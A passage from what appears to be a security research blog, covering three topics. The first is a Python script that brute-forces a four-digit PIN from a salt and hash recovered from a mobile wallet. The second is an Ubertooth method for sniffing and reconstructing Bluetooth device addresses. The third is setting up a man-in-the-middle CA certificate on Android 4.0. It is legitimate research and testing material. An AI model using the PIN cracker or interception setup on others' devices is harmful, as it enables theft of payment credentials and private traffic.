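blob = bytes([0x08, 0x96, 0x01, 0x12, 0x02]) + b"hi"
print(decode_fields(blob))   # [(1, 0, 150), (2, 2, b'hi')]
```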

Recovering the PIN from the decoded data required some understanding of the specific .proto structure. Once the salt and the hash of the salted PIN are retrieved, brute forcing the PIN is a trivial matter.
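With only 10,000 possible four-digit PINs, the search itself takes a fraction of a second. A sketch of the loop, assuming (per the public write-ups) the stored hash is SHA-256 over the decimal salt concatenated with the PIN; treat the exact construction as an assumption, not a verified copy of Wallet's scheme:

```python
import hashlib

def brute_force_pin(salt, target_hash):
    """Try all 10,000 four-digit PINs against a recovered salt + hash.
    SHA-256(str(salt) + pin) is an assumption based on public reports."""
    for pin in range(10000):
        candidate = "%s%04d" % (salt, pin)
        if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
            return "%04d" % pin
    return None

# Demo with a made-up salt and a hash generated from PIN 1234
salt = 5584422992301806306
target = hashlib.sha256(("%s1234" % salt).encode()).hexdigest()
print(brute_force_pin(salt, target))   # 1234
```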


@0xd1ab10 and @0xb3nn


Ubertooth: Bluetooth Address Breakdown

Posted: January 29, 2012 – 2:03 pm | Author: | Filed under: Tools, Wireless

The IG crew is just heading back from ShmooCon, which reminds me of last year’s awesome talk on the Ubertooth One. Intrepidus backed the kickstarter project and, as promised, got 2 Ubertooths. We recently started playing with it, and have a couple of tips and a supplementary script.

We originally followed the post here to get the Ubertooth set up on BackTrack 5, but then had some trouble keeping the device connected and sniffing reliably (similar to our experience with the Proxmark III — sensing a trend here ;) ). After updating the firmware and setting things up on an Ubuntu host, the device works flawlessly. I honestly don't remember if these are my comments in the commands below or if I found them somewhere on the internetz. I apologize if I stole your commands:

cd ubertooth/trunk/host/bluetooth_rxtx/
./ubertooth-util -f #puts the device in flash mode. lights should blink prettily.
cd ../usb_dfu/
./ubertooth-dfu write /path/to/firmware/bluetooth_rxtx.bin #this is the standard firmware. there are other special ones. suit yourself.
../bluetooth_rxtx/ubertooth-util detach

The “Getting Started” section of the Ubertooth site gives a pretty good idea of what the device can do. We found that the Ubertooth sits on one Bluetooth channel (out of the 79) and sniffs the LAP out of the Bluetooth packets. A little bit on Bluetooth address breakdown (This image is from section 3.2 of this paper):

Bluetooth address breakdown

Bluetooth MAC addresses are composed of three pieces: the Lower Address Part (LAP), the Upper Address Part (UAP), and the Non-significant Address Part (NAP). The picture above illustrates this nicely. The Ubertooth can sniff the LAP out of the air and use the error-checking field in Bluetooth packets to derive the UAP (ubertooth-lap and ubertooth-uap, respectively).
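In code, the split is just slicing the six octets; a small illustrative helper:

```python
def split_bdaddr(addr):
    """Split a Bluetooth address like '00:11:22:33:44:55' into its
    NAP (2 bytes), UAP (1 byte), and LAP (3 bytes)."""
    octets = addr.split(":")
    nap = "".join(octets[0:2])   # Non-significant Address Part
    uap = octets[2]              # Upper Address Part
    lap = "".join(octets[3:6])   # Lower Address Part
    return nap, uap, lap

print(split_bdaddr("00:11:22:33:44:55"))   # ('0011', '22', '334455')
```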

The NAP and UAP are assigned on a per-vendor basis by the IEEE. That means the UAP is available both from the Ubertooth and from the IEEE database of NAP+UAP (OUI) prefixes. By matching the UAP calculated by the Ubertooth against the last byte of each OUI, we can narrow down the 2 NAP bytes pretty quickly! Of course, it's also possible to find the full address without calculating the UAP at all: append the sniffed LAP to every prefix we can pull from the IEEE database and ping each candidate sequentially.
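The short method boils down to matching the Ubertooth-derived UAP against the last byte of each IEEE prefix. A sketch with a made-up OUI table (a real script would parse the IEEE's oui.txt registry):

```python
def nap_candidates(uap, oui_list):
    """Return candidate NAPs for a sniffed UAP. Each OUI is 3 bytes:
    NAP (2 bytes) + UAP (1 byte), so any OUI whose last byte matches
    the recovered UAP yields a possible NAP."""
    return sorted({oui[:4] for oui in oui_list
                   if oui[4:6].lower() == uap.lower()})

# Illustrative 6-hex-char OUI entries, not real vendor assignments
ouis = ["001122", "0A1B22", "001933"]
print(nap_candidates("22", ouis))   # ['0011', '0A1B']
```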

Automating stuff is fun. Here’s my (sloppy) script to figure out the NAP using first the short method, then the long if that one fails:

– Max


Man-in-the-Middle (MiTM) and certificate setup on Android 4.0

Posted: December 15, 2011 – 11:50 am | Author: | Filed under: android, Cryptography, Mallory, Mobile Security, OWASP, PKI, ssl, Tools

The Galaxy Nexus and Android's Ice Cream Sandwich (ICS) are finally here. If you've done Android application testing in the past, you've probably tried to install your own Certificate Authority (CA) cert onto an Android device or emulator. That process was somewhat painful and required root-level access on physical devices. We have an old blog post here on that process, but that all changes now with ICS.

Installing a certificate can now be done from the Settings->Security menu of an Android 4.0 device, in the "Credential Storage" section. This does not require the device to be rooted (at least on the builds we've seen so far). The "Trusted Credentials" setting lists both the system-wide installed certificates and any user-added ones. Another new feature: with a few simple clicks, the end user can disable any CA certificate on their device. Is your vendor still hanging with DigiNotar? Now you can disable that yourself without having to pull files from the device. Just click on the certificate, scroll down to the bottom of the pop-up message, then click the "Disable" button on the right.

Android 4.0 Credential Storage menu

Installing your own certificate is almost as easy. Here was my process. I needed the CA cert I generated in Mallory loaded onto my Nexus. Mallory creates a unique CA certificate per installation and stores it in Mallory's "ca" directory. To move this onto the phone, I started up Python's SimpleHTTPServer in that directory.

~/mallory/current/src/ca$ python -m SimpleHTTPServer

Now on the phone, I pointed the browser to that server on port 8000 in order to download the “ca.cer” file (adjust your IP address/port/filename as necessary).

On my device, this dropped the CA certificate onto the SD card. Back in the Settings->Security screen, find the "Install from storage" option. Click that, and your "ca.cer" file gets loaded into the "Trusted Credentials" store under the "User" tab. No bouncing castles or root needed. This will require you to set a passcode on your device (if there isn't one already). Face Unlock doesn't appear to cut it just yet.

Oh Mallory, you look so fine.

Mallory's CA Cert loaded on the device




